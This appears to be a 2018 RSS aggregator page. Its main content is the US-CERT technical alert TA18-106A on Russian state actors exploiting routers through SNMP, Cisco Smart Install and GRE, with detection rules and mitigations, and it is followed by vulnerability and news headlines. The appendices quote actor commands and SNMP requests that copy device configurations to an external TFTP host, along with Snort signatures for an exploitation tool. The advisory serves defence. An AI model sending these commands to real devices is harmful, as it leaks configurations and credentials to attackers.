Security Bulletins

US-CERT: The United States Computer Emergency Readiness Team   more  xml  hide  
last updated: Mon, 23 Apr 2018 14:45:02 GMT

 Thu, 19 Apr 2018 00:23:26 +0000 Drupal Releases Security Updates
Original release date: April 18, 2018

Drupal has released updates addressing a vulnerability in Drupal 8 and 7. A remote attacker could exploit this vulnerability to gain access to sensitive information.

NCCIC encourages users and administrators to review the Drupal Security Advisory for additional information and apply the necessary updates.


This product is provided subject to this Notification and this Privacy & Use policy.


 Wed, 18 Apr 2018 20:19:34 +0000 Cisco Releases Security Updates for Multiple Products
Original release date: April 18, 2018

Cisco has released several updates to address vulnerabilities affecting multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review the following Cisco Security Advisories and apply the necessary updates:


This product is provided subject to this Notification and this Privacy & Use policy.


 Wed, 18 Apr 2018 16:59:01 +0000 Google Releases Security Update for Chrome
Original release date: April 18, 2018

Google has released Chrome version 66.0.3359.117 for Windows, Mac, and Linux. This version addresses vulnerabilities that a remote attacker could exploit to take control of an affected system.

NCCIC encourages users and administrators to review the Chrome Releases page and apply the necessary update.


This product is provided subject to this Notification and this Privacy & Use policy.


 Tue, 17 Apr 2018 22:11:30 +0000 Oracle Releases April 2018 Security Bulletin
Original release date: April 17, 2018

Oracle has released its Critical Patch Update for April 2018 to address 254 vulnerabilities across multiple products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review the Oracle April 2018 Critical Patch Update and apply the necessary updates.


This product is provided subject to this Notification and this Privacy & Use policy.


 Mon, 16 Apr 2018 17:25:40 +0000 TA18-106A: Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices
Original release date: April 16, 2018 | Last revised: April 20, 2018

Systems Affected

  • Generic Routing Encapsulation (GRE) Enabled Devices
  • Cisco Smart Install (SMI) Enabled Devices
  • Simple Network Management Protocol (SNMP) Enabled Network Devices

Overview

Update: On April 19, 2018, an industry partner notified NCCIC and the FBI of malicious cyber activity that aligns with the techniques, tactics, and procedures (TTPs) and network indicators listed in this Alert. Specifically, the industry partner reported the actors redirected DNS queries to their own infrastructure by creating GRE tunnels and obtained sensitive information, which include the configuration files of networked devices.

NCCIC encourages organizations to use the detection and prevention guidelines outlined in this Alert to help defend against this activity. For instance, administrators should inspect the presence of protocol 47 traffic flowing to or from unexpected addresses, or unexplained presence of GRE tunnel creation, modification, or destruction in log files.

Original Post: This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS), the Federal Bureau of Investigation (FBI), and the United Kingdom’s National Cyber Security Centre (NCSC). This TA provides information on the worldwide cyber exploitation of network infrastructure devices (e.g., router, switch, firewall, Network-based Intrusion Detection System (NIDS) devices) by Russian state-sponsored cyber actors. Targets are primarily government and private-sector organizations, critical infrastructure providers, and the Internet service providers (ISPs) supporting these sectors. This report contains technical details on the tactics, techniques, and procedures (TTPs) used by Russian state-sponsored cyber actors to compromise victims. Victims were identified through a coordinated series of actions between U.S. and international partners. This report builds on previous DHS reporting and advisories from the United Kingdom, Australia, and the European Union. [1-5] This report contains indicators of compromise (IOCs) and contextual information regarding observed behaviors on the networks of compromised victims. FBI has high confidence that Russian state-sponsored cyber actors are using compromised routers to conduct man-in-the-middle attacks to support espionage, extract intellectual property, maintain persistent access to victim networks, and potentially lay a foundation for future offensive operations.

DHS, FBI, and NCSC urge readers to act on past alerts and advisories issued by the U.S. and U.K. Governments, allied governments, network device manufacturers, and private-sector security organizations. Elements from these alerts and advisories have been selected and disseminated in a wide variety of security news outlets and social media platforms. The current state of U.S. network devices—coupled with a Russian government campaign to exploit these devices—threatens the safety, security, and economic well-being of the United States.

The purpose of this TA is to inform network device vendors, ISPs, public-sector organizations, private-sector corporations, and small office home office (SOHO) customers about the Russian government campaign, provide information to identify malicious activity, and reduce exposure to this activity.

For a downloadable copy of the IOC package, see TA18-106A_TLP_WHITE.stix.xml.

Description

Since 2015, the U.S. Government received information from multiple sources—including private and public sector cybersecurity research organizations and allies—that cyber actors are exploiting large numbers of enterprise-class and SOHO/residential routers and switches worldwide. The U.S. Government assesses that cyber actors supported by the Russian government carried out this worldwide campaign. These operations enable espionage and intellectual property theft that supports the Russian Federation’s national security and economic goals.

Legacy Protocols and Poor Security Practice

Russian cyber actors leverage a number of legacy or weak protocols and service ports associated with network administration activities. Cyber actors use these weaknesses to

  • identify vulnerable devices;
  • extract device configurations;
  • map internal network architectures;
  • harvest login credentials;
  • masquerade as privileged users;
  • modify
    • device firmware,
    • operating systems,
    • configurations; and
  • copy or redirect victim traffic through Russian cyber-actor-controlled infrastructure.

Additionally, Russian cyber actors could potentially modify or deny traffic traversing through the router.

Russian cyber actors do not need to leverage zero-day vulnerabilities or install malware to exploit these devices. Instead, cyber actors take advantage of the following vulnerabilities:

  • devices with legacy unencrypted protocols or unauthenticated services,
  • devices insufficiently hardened before installation, and
  • devices no longer supported with security patches by manufacturers or vendors (end-of-life devices).

These factors allow for both intermittent and persistent access to both intellectual property and U.S. critical infrastructure that supports the health and safety of the U.S. population.

Own the Router, Own the Traffic

Network devices are ideal targets. Most or all organizational and customer traffic must traverse these critical devices. A malicious actor with presence on an organization’s gateway router has the ability to monitor, modify, and deny traffic to and from the organization. A malicious actor with presence on an organization’s internal routing and switching infrastructure can monitor, modify, and deny traffic to and from key hosts inside the network and leverage trust relationships to conduct lateral movement to other hosts. Organizations that use legacy, unencrypted protocols to manage hosts and services, make successful credential harvesting easy for these actors. An actor controlling a router between Industrial Control Systems – Supervisory Control and Data Acquisition (ICS-SCADA) sensors and controllers in a critical infrastructure—such as the Energy Sector—can manipulate the messages, creating dangerous configurations that could lead to loss of service or physical destruction. Whoever controls the routing infrastructure of a network essentially controls the data flowing through the network.

Network Devices—Often Easy Targets

  • Network devices are often easy targets. Once installed, many network devices are not maintained at the same security level as other general-purpose desktops and servers. The following factors can also contribute to the vulnerability of network devices:
  • Few network devices—especially SOHO and residential-class routers—run antivirus, integrity-maintenance, and other security tools that help protect general purpose hosts.
  • Manufacturers build and distribute these network devices with exploitable services, which are enabled for ease of installation, operation, and maintenance.
  • Owners and operators of network devices do not change vendor default settings, harden them for operations, or perform regular patching.
  • ISPs do not replace equipment on a customer’s property when that equipment is no longer supported by the manufacturer or vendor.
  • Owners and operators often overlook network devices when they investigate, examine for intruders, and restore general-purpose hosts after cyber intrusions.

Impact

Stage 1: Reconnaissance

Russian state-sponsored cyber actors have conducted both broad-scale and targeted scanning of Internet address spaces. Such scanning allows these actors to identify enabled Internet-facing ports and services, conduct device fingerprinting, and discover vulnerable network infrastructure devices. Protocols targeted in this scanning include

  • Telnet (typically Transmission Control Protocol (TCP) port 23, but traffic can be directed to a wide range of TCP ports such as 80, 8080, etc.),
  • Hypertext Transport Protocol (HTTP, port 80),
  • Simple Network Management Protocol (SNMP, ports 161/162), and
  • Cisco Smart Install (SMI port 4786).

Login banners and other data collected from enabled services can reveal the make and model of the device and information about the organization for future engagement.

Device configuration files extracted in previous operations can enhance the reconnaissance effort and allow these actors to refine their methodology.

Stage 2: Weaponization and Stage 3: Delivery

Commercial and government security organizations have identified specially crafted SNMP and SMI packets that trigger the scanned device to send its configuration file to a cyber-actor-controlled host via Trivial File Transfer Protocol (TFTP), User Datagram Protocol (UDP) port 69. [6-8] If the targeted network is blocking external SNMP at the network boundary, cyber actors spoof the source address of the SNMP UDP datagram as coming from inside the targeted network. The design of SMI (directors and clients) requires the director and clients to be on the same network. However, since SMI is an unauthenticated protocol, the source address for SMI is also susceptible to spoofing.

The configuration file contains a significant amount of information about the scanned device, including password hash values. These values allow cyber actors to derive legitimate credentials. The configuration file also contains SNMP community strings and other network information that allows the cyber actors to build network maps and facilitate future targeted exploitation.

Stage 4: Exploitation

Legitimate user masquerade is the primary method by which these cyber actors exploit targeted network devices. In some cases, the actors use brute-force attacks to obtain Telnet and SSH login credentials. However, for the most part, cyber actors are able to easily obtain legitimate credentials, which they then use to access routers. Organizations that permit default or commonly used passwords, have weak password policies, or permit passwords that can be derived from credential-harvesting activities, allow cyber actors to easily guess or access legitimate user credentials. Cyber actors can also access legitimate credentials by extracting password hash values from configurations sent by owners and operators across the Internet or by SNMP and SMI scanning.

Armed with the legitimate credentials, cyber actors can authenticate into the device as a privileged user via remote management services such as Telnet, SSH, or the web management interface.

Stage 5: Installation

SMI is an unauthenticated management protocol developed by Cisco. This protocol supports a feature that allows network administrators to download or overwrite any file on any Cisco router or switch that supports this feature. This feature is designed to enable network administrators to remotely install and configure new devices and install new OS files.

On November 18, 2016, a Smart Install Exploitation Tool (SIET) was posted to the Internet. The SIET takes advantage of the unauthenticated SMI design. Commercial and government security organizations have noted that Russian state-sponsored cyber actors have leveraged the SIET to abuse SMI to download current configuration files. Of concern, any actor may leverage this capability to overwrite files to modify the device configurations, or upload maliciously modified OS or firmware to enable persistence. Additionally, these network devices have writeable file structures where malware for other platforms may be stored to support lateral movement throughout the targeted network.

Stage 6: Command and Control

Cyber actors masquerade as legitimate users to log into a device or establish a connection via a previously uploaded OS image with a backdoor. Once successfully logged into the device, cyber actors execute privileged commands. These cyber actors create a man-in-the-middle scenario that allows them to

  • extract additional configuration information,
  • export the OS image file to an externally located cyber actor-controlled FTP server,
  • modify device configurations,
  • create Generic Routing Encapsulation (GRE) tunnels, or
  • mirror or redirect network traffic through other network infrastructure they control.

At this stage, cyber actors are not restricted from modifying or denying traffic to and from the victim. Although there are no reports of this activity, it is technically possible.

Solution

Telnet

Review network device logs and netflow data for indications of TCP Telnet-protocol traffic directed at port 23 on all network device hosts. Although Telnet may be directed at other ports (e.g., port 80, HTTP), port 23 is the primary target. Inspect any indication of Telnet sessions (or attempts). Because Telnet is an unencrypted protocol, session traffic will reveal command line interface (CLI) command sequences appropriate for the make and model of the device. CLI strings may reveal login procedures, presentation of user credentials, commands to display boot or running configuration, copying files and creation or destruction of GRE tunnels, etc. See Appendices A and B for CLI strings for Cisco and other vendors’ devices.

SNMP and TFTP

Review network device logs and netflow data for indications of UDP SNMP traffic directed at port 161/162 on all network-device hosts. Because SNMP is a management tool, any such traffic that is not from a trusted management host on an internal network should be investigated. Review the source address of SNMP traffic for indications of addresses that spoof the address space of the network. Review outbound network traffic from the network device for evidence of Internet-destined UDP TFTP traffic. Any correlation of inbound or spoofed SNMP closely followed by outbound TFTP should be cause for alarm and further inspection. See Appendix C for detection of the cyber actors’ SNMP tactics.

Because TFTP is an unencrypted protocol, session traffic will reveal strings associated with configuration data appropriate for the make and model of the device. See Appendices A and B for CLI strings for Cisco and other vendor’s devices.

SMI and TFTP

Review network device logs and netflow data for indications of TCP SMI protocol traffic directed at port 4786 of all network-device hosts. Because SMI is a management feature, any traffic that is not from a trusted management host on an internal network should be investigated. Review outbound network traffic from the network device for evidence of Internet-destined UDP TFTP traffic. Any correlation of inbound SMI closely followed by outbound TFTP should be cause for alarm and further inspection. Of note, between June 29 and July 6, 2017, Russian actors used the SMI protocol to scan for vulnerable network devices. Two Russian cyber actors controlled hosts 91.207.57.69(3) and 176.223.111.160(4), and connected to IPs on several network ranges on port 4786. See Appendix D for detection of the cyber actors’ SMI tactics.

Because TFTP is an unencrypted protocol, session traffic will reveal strings appropriate for the make and model of the device. See Appendices A and B for CLI strings for Cisco and other vendors’ devices.

Determine if SMI is present

  • Examine the output of “show vstack config | inc Role”. The presence of “Role: Client (SmartInstall enabled)” indicates that Smart Install is configured.
  • Examine the output of "show tcp brief all" and look for "*:4786". The SMI feature listens on tcp/4786.
  • Note: The commands above will indicate whether the feature is enabled on the device but not whether a device has been compromised.

Detect use of SMI

The following signature may be used to detect SMI usage. Flag as suspicious and investigate SMI traffic arriving from outside the network boundary. If SMI is not used inside the network, any SMI traffic arriving on an internal interface should be flagged as suspicious and investigated for the existence of an unauthorized SMI director. If SMI is used inside the network, ensure that the traffic is coming from an authorized SMI director, and not from a bogus director.

  • alert tcp any any -> any 4786 (msg:"Smart Install Protocol"; flow:established,only_stream; content:"|00 00 00 01 00 00 00 01|"; offset:0; depth:8; fast_pattern;)
  • See Cisco recommendations for detecting and mitigating SMI. [9]

Detect use of SIET

The following signatures detect usage of the SIET's commands change_config, get_config, update_ios, and execute. These signatures are valid based on the SIET tool available as of early September 2017:

  • alert tcp any any -> any 4786 (msg:"SmartInstallExploitationTool_UpdateIos_And_Execute"; flow:established; content:"|00 00 00 01 00 00 00 01 00 00 00 02 00 00 01 c4|"; offset:0; depth:16; fast_pattern; content:"://";)
  • alert tcp any any -> any 4786 (msg:"SmartInstallExploitationTool_ChangeConfig"; flow:established; content:"|00 00 00 01 00 00 00 01 00 00 00 03 00 00 01 28|"; offset:0; depth:16; fast_pattern; content:"://";)
  • alert tcp any any -> any 4786 (msg: "SmartInstallExploitationTool_GetConfig"; flow: established; content:"|00 00 00 01 00 00 00 01 00 00 00 08 00 00 04 08|"; offset:0; depth:16; fast_pattern; content:"copy|20|";)

In general, exploitation attempts with the SIET tool will likely arrive from outside the network boundary. However, before attempting to tune or limit the range of these signatures, i.e. with $EXTERNAL_NET or $HOME_NET, it is recommended that they be deployed with the source and destination address ranges set to “any”. This will allow the possibility of detection of an attack from an unanticipated source, and may allow for coverage of devices outside of the normal scope of what may be defined as the $HOME_NET.

GRE Tunneling

Inspect the presence of protocol 47 traffic flowing to or from unexpected addresses, or unexplained presence of GRE tunnel creation, modification, or destruction in log files.

Mitigation Strategies

There is a significant amount of publically available cybersecurity guidance and best practices from DHS, allied government, vendors, and the private-sector cybersecurity community on mitigation strategies for the exploitation vectors described above. The following are additional mitigations for network device manufacturers, ISPs, and owners or operators.

General Mitigations

All

  • Do not allow unencrypted (i.e., plaintext) management protocols (e.g. Telnet) to enter an organization from the Internet. When encrypted protocols such as SSH, HTTPS, or TLS are not possible, management activities from outside the organization should be done through an encrypted Virtual Private Network (VPN) where both ends are mutually authenticated.
  • Do not allow Internet access to the management interface of any network device. The best practice is to block Internet-sourced access to the device management interface and restrict device management to an internal trusted and whitelisted host or LAN. If access to the management interface cannot be restricted to an internal trusted network, restrict remote management access via encrypted VPN capability where both ends are mutually authenticated. Whitelist the network or host from which the VPN connection is allowed, and deny all others.
  • Disable legacy unencrypted protocols such as Telnet and SNMPv1 or v2c. Where possible, use modern encrypted protocols such as SSH and SNMPv3. Harden the encrypted protocols based on current best security practice. DHS strongly advises owners and operators to retire and replace legacy devices that cannot be configured to use SNMP V3.
  • Immediately change default passwords and enforce a strong password policy. Do not reuse the same password across multiple devices. Each device should have a unique password. Where possible, avoid legacy password-based authentication, and implement two-factor authentication based on public-private keys. See NCCIC/US-CERT TA13-175A – Risks of Default Passwords on the Internet, last revised October 7, 2016.

Manufacturers

  • Do not design products to support legacy or unencrypted protocols. If this is not possible, deliver the products with these legacy or unencrypted protocols disabled by default, and require the customer to enable the protocols after accepting an interactive risk warning. Additionally, restrict these protocols to accept connections only from private addresses (i.e., RFC 1918).
  • Do not design products with unauthenticated services. If this is not possible, deliver the products with these unauthenticated services disabled by default, and require the customer to enable the services after accepting an interactive risk warning. Additionally, these unauthenticated services should be restricted to accept connections only from private address space (i.e., RFC 1918).
  • Design installation procedures or scripts so that the customer is required to change all default passwords. Encourage the use of authentication services that do not depend on passwords, such as RSA-based Public Key Infrastructure (PKI) keys.
  • Because YARA has become a security-industry standard way of describing rules for detecting malicious code on hosts, consider embedding YARA or a YARA-like capability to ingest and use YARA rules on routers, switches, and other network devices.

Security Vendors

  • Produce and publish YARA rules for malware discovered on network devices.

ISPs

  • Do not field equipment in the network core or to customer premises with legacy, unencrypted, or unauthenticated protocols and services. When purchasing equipment from vendors, include this requirement in purchase agreements.
  • Disable legacy, unencrypted, or unauthenticated protocols and services. Use modern encrypted management protocols such as SSH. Harden the encrypted protocols based on current best security practices from the vendor.
  • Initiate a plan to upgrade fielded equipment no longer supported by the vendor with software updates and security patches. The best practice is to field only supported equipment and replace legacy equipment prior to it falling into an unsupported state.
  • Apply software updates and security patches to fielded equipment. When that is not possible, notify customers about software updates and security patches and provide timely instructions on how to apply them.

Owners or operators

  • Specify in contracts that the ISP providing service will only field currently supported network equipment and will replace equipment when it falls into an unsupported state.
  • Specify in contracts that the ISP will regularly apply software updates and security patches to fielded network equipment or will notify and provide the customers the ability to apply them.
  • Block TFTP from leaving the organization destined for Internet-based hosts. Network devices should be configured to send configuration data to a secured host on a trusted segment of the internal management LAN.
  • Verify that the firmware and OS on each network device are from a trusted source and issued by the manufacturer. To validate the integrity of network devices, refer to the vendor’s guidance, tools, and processes. See Cisco’s Security Center for guidance to validate Cisco IOS firmware images.
  • Cisco IOS runs in a variety of network devices under other labels, such as Linksys and SOHO Internet Gateway routers or firewalls as part of an Internet package by ISPs (e.g., Comcast). The indicators in Appendix A may be applicable to your device.

Detailed Mitigations

Refer to the vendor-specific guidance for the make and model of network device in operation.

For information on mitigating SNMP vulnerabilities, see

How to Mitigate SMI Abuse

  • Configure network devices before installing onto a network exposed to the Internet. If SMI must be used during installation, disable SMI with the “no vstack” command before placing the device into operation.
  • Prohibit remote devices attempting to cross a network boundary over TCP port 4786 via SMI.
  • Prohibit outbound network traffic to external devices over UDP port 69 via TFTP.
  • See Cisco recommendations for detecting and mitigating SMI. [10]
  • Cisco IOS runs in a variety of network devices under other labels, such as Linksys and SOHO Internet Gateway routers or firewalls as part of an Internet package by ISPs (e.g., Comcast). Check with your ISP and ensure that they have disabled SMI before or at the time of installation, or obtain instructions on how to disable it.

How to Mitigate GRE Tunneling Abuse:

  • Verify that all routing tables configured in each border device are set to communicate with known and trusted infrastructure.
  • Verify that any GRE tunnels established from border routers are legitimate and are configured to terminate at trusted endpoints.

 

Definitions

Operating System Fingerprinting is analyzing characteristics of packets sent by a target, such as packet headers or listening ports, to identify the operating system in use on the target. [11]

Spear phishing is an attempt by an individual or group to solicit personal information from unsuspecting users by employing social engineering techniques. Phishing emails are crafted to appear as if they were sent from a legitimate organization or known individual. These emails often attempt to entice users to click on a link that will take the user to a fraudulent website that appears legitimate. The user then may be asked to provide personal information, such as account usernames and passwords, which can further expose them to future compromises. [12]

In a watering hole attack, the attacker compromises a site likely to be visited by a particular target group, rather than attacking the target group directly. [13]

 

Report Notice

DHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to NCCIC or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at NCCICcustomerservice@hq.dhs.gov or 888-282-0870 and the FBI through a local field office or the FBI’s Cyber Division at CyWatch@fbi.gov or 855-292-3937. To request information from or report cyber incidents to UK authorities, contact NCSC at www.ncsc.gov.uk/contact.

 

Appendix A: Cisco Related Command and Configuration Strings

Command Strings.

Commands associated with Cisco IOS. These strings may be seen in inbound network traffic of unencrypted management tools such as Telnet or HTTP, in the logs of application layer firewalls, or in the logs of network devices. Network device owners and operators should review the Cisco documentation of their particular makes and models for strings that would allow the owner or operator to customize the list for an Intrusion Detection System (IDS). Detecting commands from Internet-based hosts should be a cause for concern and further investigation. Detecting these strings in network traffic or log files does not confirm compromise. Further analysis is necessary to remove false positives.

Strings:

'sh arp'           
'sho arp'           
'show arp'
'sh bgp sum'       
'sho bgp sum'       
'show bgp sum'
'sh cdp'           
'sho cdp'           
'show cdp'
'sh con'           
'sho con'
'show con'
'sh ip route'     
'sho ip route'      
'show ip route'
'sh inv'           
'sho inv'           
'show inv'
'sh int'           
'sho int'           
'show int'
'sh nat trans'    
'sho nat trans'     
'show nat trans'
'sh run'           
'sho run'           
'show run'
'sh ver'           
'sho ver'           
'show ver'
'sh isis'          
'sho isis'          
'show isis'
'sh rom-monitor'   
'sho rom-monitor'   
'show rom-monitor'
'sh startup-config'
'sho startup-config'
'show startup-config'
'sh boot'          
'sho boot'          
'show boot'
'enable'          
'enable secret'

Configuration Strings.

Strings associated with Cisco IOS configurations may be seen in the outbound network traffic of unencrypted management tools such as Telnet, HTTP, or TFTP. This is a subset of the possible strings. Network device owners and operators should export the configuration of their particular makes and models to a secure host and examine it for strings that would allow the owner or operator to customize the list for an IDS. Detecting outbound configuration data leaving an organization destined for Internet-based hosts should be a cause for concern and further investigation to ensure the destination is authorized to receive the configuration data. Because configuration data provides an adversary with information—such as the password hashes—to enable future attacks, configuration data should be encrypted between sender and receiver. Outbound configuration files may be triggered by SNMP queries and Cisco Smart Install commands. In such cases, the outbound file would be sent via TFTP. Detecting these strings in network traffic or log files does not confirm compromise. Further analysis is necessary to remove false positives.

Strings:

aaa new-model
advertisement version
BGP router identifier
boot system flash:
Building configuration?
Cisco Internetwork Operating System
Cisco IOS Software,
Configuration register
www.cisco.com/techsupport
Codes C ? connected, S ? static
configuration memory
Current configuration :
boot-start-marker
! Last configuration change at 
! NVRAM config last updated at 
interface VLAN
interface FastEthernet
interface GigabitEthernet
interface pos
line protocol is
loopback not set
ip access-list extended
nameif outside
Routing Bit Set on this LSA
route source
router bgp
router ospf
routing table
ROM: Bootstrap program is
snmp-server
system bootstrap
System image file is
PIX VERSION
ASA VERSION
(ASA)
boot-start-marker
boot system flash
boot end-marker
BOOT path-list

 

Appendix B: Other Vendor Command and Configuration Strings

Russian state-sponsored cyber actors could potentially target the network devices from other manufacturers. Therefore, operators and owners should review the documentation associated with the make and model they have in operation to identify strings associated with administrative functions. Export the current configuration and identify strings associated with the configuration. Place the device-specific administrative and configuration strings into network-based and host-based IDS. Examples for Juniper JUNOS may include: “enable”, ”reload”, ”show”, ”set”, ”unset” ”file copy”, or ”request system scripts” followed by other expected parameters. Examples for MicroTic may include: “ip”, ”interface”, ”firewall”, ”password”, or ”ping”. See the documentation for your make and model for specific strings and parameters to place on watch.

These strings may be seen in inbound network traffic of unencrypted management tools such as Telnet or HTTP, in the logs of application layer firewalls or network devices. Detecting commands from Internet-based hosts should be a cause for concern and further investigation. Detecting these strings in network traffic or log files does not confirm compromise. Further analysis is necessary to remove false positives.

The following are important functions to monitor:

  • login
  • displaying or exporting the current configuration
  • copying files from the device to another host, especially a host outside the LAN or one not previously authorized
  • copying files to the device from another host, especially a host outside the LAN or one not previously authorized
  • changes to the configuration
  • creation or destruction of GRE tunnels

 

Appendix C: SNMP Queries

  • SNMP query containing any of the following from an external host
    • show run
    • show ip arp
    • show version
    • show ip route
    • show neighbor detail
    • show interface
  • SNMP Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter of “80.255.3.85”
  • SNMP and Cisco's "config copy" management information base (MIB) object identifiers (OIDs) Command ID  1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter of “87.120.41.3” and community strings of ”public” ”private” or ”anonymous”
OID NameOID ValueMeaning
1.3.6.1.4.1.9.9.96.1.1.1.1.21Protocol type = TFTP
1.3.6.1.4.1.9.9.96.1.1.1.1.31Source file type = network file
1.3.6.1.4.1.9.9.96.1.1.1.1.44Destination file type = running config
1.3.6.1.4.1.9.9.96.1.1.1.1.587.120.41.3TFTP server IP = 87.120.41.3
1.3.6.1.4.1.9.9.96.1.1.1.1.6backupFile name = backup
1.3.6.1.4.1.9.9.96.1.1.1.1.144Activate the status of the table entry
  • SNMP Command ID 1.3.6.1.4.1.9.9.96 with the TFTP server IP parameter 80.255.3.85
  • SNMP v2c and v1 set-requests with the OID 1.3.6.1.4.1.9.2.1.55 with the TFTP server IP parameter “87.120.41.3”, using community strings “private” and “anonymous”
  • The OID 1.3.6.1.4.1.9.2.1.55.87.120.41.3 is a request to transfer a copy of a router's configuration to the IP address specified in the last four octets of the OID, in this case 87.120.41.3.
  • Since late July 2016, 87.120.41.3 has been scanning thousands of IPs worldwide using SNMP.
  • Between November 21 and 22, 2016, Russian cyber actors attempted to scan using SNMP version 2 Object Identifier (OID) 1.3.6.1.4.9.9.96.1.1.1.1.5 with a value of 87.120.41.3 and a community string of “public”. This command would cause vulnerable devices to exfiltrate configuration data to a specified IP address over TFTP; in this case, IP address 87.120.41.3.
  • SNMP, TFTP, HTTP, Telnet, or SSH traffic to or from the following IPs
    • 210.245.123.180

 

Appendix D: SMI Queries

Between June 29 and July 6, 2017, Russian actors used the Cisco Smart Install protocol to scan for vulnerable network devices. Two Russian cyber actor-controlled hosts, 91.207.57.69(3) and 176.223.111.160(4), connected to IPs on several network ranges on port 4786 and sent the following two commands:

  • copy nvram:startup-config flash:/config.text
  • copy nvram:startup-config tftp://[actor address]/[actor filename].conf

In early July 2017, the commands sent to targets changed slightly, copying the running configuration file instead of the startup configuration file. Additionally, the second command copies the file saved to flash memory instead of directly copying the configuration file.

  • copy system:running-config flash:/config.text
  • copy flash:/config.text tftp://[ actor address]/[actor filename].conf

References

Revision History

  • April 16, 2018: Initial Version
  • April 19, 2018: Added third-party reporting

This product is provided subject to this Notification and this Privacy & Use policy.



[logo] SecurityFocus Vulnerabilities   more  xml  hide  
last updated: Mon, 23 Apr 2018 14:54:06 GMT

 2018-04-23 Vuln: Google Android Qualcomm Components Multiple Security Vulnerabilities
Google Android Qualcomm Components Multiple Security Vulnerabilities
 2018-04-23 Vuln: Linux Kernel 'net/netfilter/xt_TCPMSS.c' Denial of Service Vulnerability
Linux Kernel 'net/netfilter/xt_TCPMSS.c' Denial of Service Vulnerability
 2018-04-23 Vuln: Linux Kernel 'net/netlink/af_netlink.c' Local Information Disclosure Vulnerability
Linux Kernel 'net/netlink/af_netlink.c' Local Information Disclosure Vulnerability
 2018-04-23 Vuln: Linux Kernel CVE-2017-8824 Local Privilege Escalation Vulnerability
Linux Kernel CVE-2017-8824 Local Privilege Escalation Vulnerability
  Bugtraq: [SE-2011-01] The origin and impact of vulnerabilities in ST chipsets
[SE-2011-01] The origin and impact of vulnerabilities in ST chipsets

[logo] Yahoo News - Latest News & Headlines   more  xml  hide  
last updated: Mon, 23 Apr 2018 14:40:46 GMT

 Mon, 23 Apr 2018 09:09:19 -0400 The Great Republican Tax Cut Backfire

The Great Republican Tax Cut BackfireDid you have a happy Tax Day? Are you feeling grateful for the Republican tax


 Sun, 22 Apr 2018 11:48:37 -0400 As chemical weapons inspectors reach Douma, Syria claims suspected attack was fake

As chemical weapons inspectors reach Douma, Syria claims suspected attack was fakeThe chemical weapons inspectors reached the city of Douma, now under Russian and Syrian control, two weeks after the suspected attack took place.


 Sun, 22 Apr 2018 17:42:38 -0400 Waffle House Customer Hailed A Hero After Wrestling Rifle Away From Shooter

Waffle House Customer Hailed A Hero After Wrestling Rifle Away From ShooterA 29-year-old man is being hailed as a hero after he single-handedly disarmed


 Sat, 21 Apr 2018 12:23:46 -0400 Suspect in Ocala, Florida school shooting: ‘I want to be put away’

Suspect in Ocala, Florida school shooting: ‘I want to be put away’As students around the country rallied against gun violence on Friday, one student was injured in a shooting at a Florida high school. The suspect spoke to local NBC reporter Matt Lupoli.


 Sun, 22 Apr 2018 03:12:02 -0400 Perez: Democrats' Trump-Russia lawsuit isn't a fundraising stunt

Perez: Democrats' Trump-Russia lawsuit isn't a fundraising stuntDNC Chairman Tom Perez dismisses criticisms of a civil lawsuit filed against the Trump campaign. "Those are almost the precise quotes we heard from the Nixon campaign in 1972."


 Sat, 21 Apr 2018 19:22:25 -0400 Man killed in random knife attack at California steakhouse

Man killed in random knife attack at California steakhouseLOS ANGELES (AP) — A homeless man who randomly stabbed a patron in a crowded Southern California restaurant to death as he was holding his daughter was reported just a few hours earlier for disruptive behavior, but police ultimately determined he was not a threat, authorities said Saturday.


 Sun, 22 Apr 2018 15:17:58 -0400 Southwest Cancels 40 Flights as It Works to Inspect Plane Engines After Deadly Explosion

Southwest Cancels 40 Flights as It Works to Inspect Plane Engines After Deadly ExplosionThe same engine that exploded last week powers nearly all of Southwest's fleet


 Sun, 22 Apr 2018 18:59:30 -0400 Who is Scott Pruitt? EPA chief whose whole career has been dogged by ethics concerns

Who is Scott Pruitt? EPA chief whose whole career has been dogged by ethics concernsEarly in Scott Pruitt’s political career, as a state senator from Tulsa, Oklahoma, he attended a gathering at the Oklahoma City home of an influential telecommunications lobbyist who was nearing retirement and about to move away. The lobbyist said that after the 2003 gathering, Mr Pruitt – who had a modest legal practice and a state salary of $38,400 – reached out to her. “For those ego-minded politicians, it would be pretty cool to have this house close to the Capitol,” said the lobbyist, Marsha Lindsey.


 Sat, 21 Apr 2018 11:48:31 -0400 'Overwhelmed' Letter Carrier Allegedly Held Onto 17,000 Pieces Of Mail

'Overwhelmed' Letter Carrier Allegedly Held Onto 17,000 Pieces Of MailAn "overwhelmed" New York City postal worker stashed more than 17,000 pieces


 Sat, 21 Apr 2018 11:04:35 -0400 Mourning Barbara Bush

Mourning Barbara BushSeveral former U.S. presidents were among the 1,500 mourners expected to gather at a Houston church on Saturday for the funeral of former first lady Barbara Bush, who died on Tuesday at the age of 92.


 Sat, 21 Apr 2018 15:42:20 -0400 Video shows bullet-ridden vehicle after police shooting

Video shows bullet-ridden vehicle after police shootingDiante Yarber was driving the Ford Mustang when Barstow police officers shot in the vehicle and killed him.


 Sun, 22 Apr 2018 13:48:36 -0400 Failed talks with North Korea may lead to war

Failed talks with North Korea may lead to warJung Pak, senior fellow at the Brookings Institution, says there is little to fall back on if talks between President Trump and Supreme Leader Kim Jong-un fail.


 Sat, 21 Apr 2018 18:40:51 -0400 R. Kelly's Lawyer, Publicist And Assistant Flee From Singer Amid Scandals

R. Kelly's Lawyer, Publicist And Assistant Flee From Singer Amid ScandalsSinger R. Kelly's scandals may be too much for the people he employs. Since


 Sat, 21 Apr 2018 12:01:25 -0400 Avoid romaine lettuce, CDC warns, amid E. coli outbreak

Avoid romaine lettuce, CDC warns, amid E. coli outbreakThe warning stems from romaine lettuce grown in Yuma, Arizona and shipped across the country, the with CDC telling grocery stores, restaurants, and consumers not to eat the lettuce unless they can be certain it didn’t come from that area.


 Sun, 22 Apr 2018 22:16:25 -0400 Islamic State suicide bomber kills 57 in Afghan capital

